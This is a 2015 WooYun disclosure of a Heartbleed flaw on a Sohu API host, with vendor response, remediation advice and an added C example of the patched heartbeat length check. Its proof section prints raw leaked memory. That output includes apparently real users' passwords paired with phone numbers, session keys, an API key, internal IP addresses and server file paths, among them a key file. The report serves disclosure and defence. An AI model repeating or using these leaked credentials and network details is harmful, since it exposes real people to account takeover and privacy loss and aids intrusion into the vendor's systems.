
Vulnerability Summary

Defect ID: wooyun-2015-0125620

Title: Heartbleed vulnerability on a Sohu site leaks sensitive information

Vendor: 搜狐 (Sohu)

Author: 路人甲

Submitted: 2015-07-09 14:30

Fixed: 2015-08-23 14:54

Published: 2015-08-23 14:54

Vulnerability type: System/service patch not applied in time

Severity: High

Self-assessed Rank: 16

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-07-09: Details sent to the vendor, awaiting vendor action
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and domain experts
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public

Brief description:

Detailed description:

Affected host: 123.125.123.130 (api.wan.sohu.com)

Proof of vulnerability:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3364
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
Host: api.wan.sohu.com..Connection: Keep-Alive..Accept-Encoding: gzip..Content-Length: 133....app_id=1003&captcha=5602&nick_name=%25E5%25A4%25A7%25E5%2585%2589%25E6%25A3%258D&password=yt990503&phone_number=15879013943&psid=772&.h...D.....M#. MTV_SRC=1001%7C0001; SUV=1434039599455980; _channeled=1212130001; _smuid=0GMlZgBkUdkXMZAV0OoJP5; _trans_=000012_qq_hp; adaptor_version=3; curAreaFlag=310000; hide_ad=0; page_version=3; position=9; vjlast=1425428358.1426202859.11; vjuids=1b1695acd.14be226a4e6.0.1ddb593c....c5NCwmbjc5NCwmaSc5NCwmdyc5NCwmaCc5NCwmYyc5NCwmZSc5NCwmbSc5NCwmdCc5NH0; SUV=1433391828780841; utsf_shop_joke=s_00007; vjlast=1429887881.1429887881.30; vjuids=-a54cb6c35.14cebf58eec.0.eed5da3c; CMAP=1;..Cache-Control. max-age=0...., bntpl, txxnhf, hvzajzau, tkdfkn, txxnhftu, zajzau, txvckgxv, unptxx, ftuhv, epcvganp, trkarh, pphetr, dtdyazja ,hutf..User-Agent. Mozilla/4.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11)....0703/n416150345.shtml#211^%u7B2C%u5341%u4E8C%u671F%u5168%u7A0B^1435977483055^^5747.180000000001^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1690147.jpg%2C407272302^2347911^0^6302^254211^http://tv.sohu.com/20150428/n412012561.shtml?txid=1946be12ca182ba8107a42119010c9b0#6302^%u6709%u79CD%u4F60%u7231%u6211^1436079573069^^6389.480000000002^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1627448.jpg%2C406695129^2453420^0^2666^279^http://tv.sohu.com/20150707/n416343014.shtml#2666^%u504F%u504F%u559C%u6B22%u4F60%u7B2C38%u96C6^1436333505601^http://tv.sohu.com/20150708/n416343489.shtml^2666.613^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1693746.jpg%2C406695131^2453518^0^149^5^http://tv.sohu.com/20150708/n416343489.shtml#149^%u504F%u504F%u559C%u6B22%u4F60%u7B2C39%u96C6%u9884%u544A%u7247^1436333784769^http://tv.sohu.com/20150707/n416275341.shtml^170.06294784580498^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1693816.jpg; isJump=0; dm_input_tips=true; 
fuid=14301274667259372212; interaction=8354341:1436332039835
Selected information recovered from the leaked memory:
api_key=9854b2afa779e1a6bff1962447a09dbd
/opt/nginx/logs/api.tv.sohu.com.log.error_log
/opt/nginx/logs/pay.wan.sohu.com.log
/opt/nginx/conf/pay.wan.sohu.com.pem
x-huawei-NASIP. 10.58.0.1
x-huawei-sgsnip. 116.79.217.64
10.10.22.122:8106
10.10.76.163:8106
10.10.22.116:8106.server..10.16.48.28:8106
10.16.48.38:8106
10.10.76.163:810
10.16.48.28:8106
10.16.48.109:8106
10.10.10.76/opt/nginx/proxy_temp
server..10.16.48.56:8080..10.16.48.56:8080.08..10.16.48.56:8080.server..10.10.22.188:8080..10.10.22.188:8080
Host: api.tv.sohu.com..X-Real-IP: 10.20.102.101..X-Forwarded-For: 113.17.138.17, 113.17.138.17, 10.20.102.101
Host. api.tv.sohu.com..X-Forwarded-For. 58.209.230.76, 58.209.230.76
Host: tvapi.sohuno.com..X-Real-IP: 10.10.22.187..X-Forwarded-For: 10.10.22.187
app_id=1003&captcha=5602&nick_name=%25E5%25A4%25A7%25E5%2585%2589%25E6%25A3%258D&password=yt990503&phone_number=15879013943&psid=772
app_id=1003&captcha=1013&nick_name=%25E6%25B8%2585%25E9%25A3%258E&password=840717&phone_number=13869052981&psid=772
app_id=1003&captcha_pic=6742&password=123456aaa&phone_number=13698641999&psid=772
nick_name=123456&password=bbbuytemncedd&phone_number=18539772468&psid=772
password=123456&phone_number=15027965990&psid=772
ssword=13598478911&phone_number=13598478911&psid=772
app_id=1003&captcha=0571&phone_number=18805474887&psid=772&session_key=d62c1dfb0dc6f19b04f331de5abd39ee4ca262fdb8d316c9fed8d58c4de8d163&wanuid=682052495
app_id=1003&password=lvbu0019&phone_number=15100323322&psid=772
app_id=1003&captcha=3270&nick_name=zzj412000&password=zzj412000&phone_number=18218534460&psid=772
app_id=1003&captcha=8838&nick_name=%25E5%2593%25A5%25E4%25BB%25AC&password=322506&phone_number=13086660202&psid=772
app_id=1003&psid=772&session_key=f7cd256d689460b8cbfdfc8d7068e10f3ccf75aff9b882b2a18b12ecf26ccacd&wanuid=682051793&one_number=18562636516&psid=772
The account names and passwords obtained are from requests to this API,
but I could not find which services are calling this API endpoint.

Remediation:

Apply the patch (update OpenSSL).
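The remediation is simply to apply the vendor patch. To show what that patch actually changes, the following is an added example, not code from this report, from Sohu, or from OpenSSL itself: a C model of the RFC 6520 heartbeat record check that the Heartbleed fix introduced. The function names (hb_validate, hb_build_response) and the sample records are constructed for illustration; the oversized 16384-byte claim mirrors the 16384-byte heartbeat response length visible in the proof above.

```c
/* Added example (not from the WooYun report): a model of the TLS heartbeat
 * (RFC 6520) length check that the OpenSSL Heartbleed fix introduced.
 * Function names and the record bytes below are constructed for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16   /* RFC 6520: at least 16 bytes of padding */

/* Outcome of validating one heartbeat record. */
enum hb_result {
    HB_OK = 0,              /* well-formed: a reply may echo payload_len bytes */
    HB_ERR_TOO_SHORT,       /* record shorter than the fixed 3-byte header */
    HB_ERR_BAD_TYPE,        /* neither request nor response */
    HB_ERR_LENGTH_MISMATCH  /* claimed payload exceeds the record: the Heartbleed case */
};

/* Validate a heartbeat record body as handed up by the TLS record layer.
 * rec/rec_len are the plaintext bytes actually received; on success
 * *payload_len receives the declared payload length, which the caller
 * may then safely echo back. */
enum hb_result hb_validate(const uint8_t *rec, size_t rec_len, uint16_t *payload_len)
{
    /* type(1) + payload_length(2) must be present before anything is read. */
    if (rec_len < 3)
        return HB_ERR_TOO_SHORT;

    uint8_t type = rec[0];
    if (type != TLS1_HB_REQUEST && type != TLS1_HB_RESPONSE)
        return HB_ERR_BAD_TYPE;

    uint16_t claimed = (uint16_t)((rec[1] << 8) | rec[2]);

    /* The check the unpatched code lacked: the declared payload plus the
     * mandatory padding must fit inside the bytes that actually arrived.
     * Without it, a reply of `claimed` bytes copies memory beyond the record. */
    if ((size_t)1 + 2 + claimed + HB_PADDING > rec_len)
        return HB_ERR_LENGTH_MISMATCH;

    *payload_len = claimed;
    return HB_OK;
}

/* Build a heartbeat response for a validated request: echo the payload and
 * append padding. Returns the response length, or 0 if the request is
 * rejected, so no byte beyond the received record is ever copied. */
size_t hb_build_response(const uint8_t *req, size_t req_len, uint8_t *out, size_t out_cap)
{
    uint16_t plen;
    if (hb_validate(req, req_len, &plen) != HB_OK)
        return 0;
    size_t resp_len = 1 + 2 + (size_t)plen + HB_PADDING;
    if (resp_len > out_cap)
        return 0;
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (uint8_t)(plen >> 8);
    out[2] = (uint8_t)(plen & 0xff);
    memcpy(out + 3, req + 3, plen);          /* bounded by hb_validate above */
    memset(out + 3 + plen, 0, HB_PADDING);   /* real servers use random padding */
    return resp_len;
}

/* Constructed sample records (not captured traffic). */
/* Well-formed: 4-byte payload "ping" + 16 bytes padding = 23 bytes. */
const uint8_t GOOD_REC[23] = {
    TLS1_HB_REQUEST, 0x00, 0x04, 'p', 'i', 'n', 'g',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
/* Malformed: claims 0x4000 (16384) payload bytes but carries only 20. */
const uint8_t BAD_REC[23] = {
    TLS1_HB_REQUEST, 0x40, 0x00, 'p', 'i', 'n', 'g',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };

int main(void)
{
    uint8_t out[64];
    size_t n = hb_build_response(GOOD_REC, sizeof GOOD_REC, out, sizeof out);
    printf("well-formed record -> response of %zu bytes\n", n);
    n = hb_build_response(BAD_REC, sizeof BAD_REC, out, sizeof out);
    printf("oversized length claim -> response of %zu bytes (rejected)\n", n);
    return 0;
}
```

A patched server responds only with bytes it actually received, so a request that declares more payload than it carries is discarded instead of answered with a 16 KB slice of process memory of the kind shown in the proof section.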

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-07-09 14:53

Vendor reply:

Thanks for the support.

Latest status:

None yet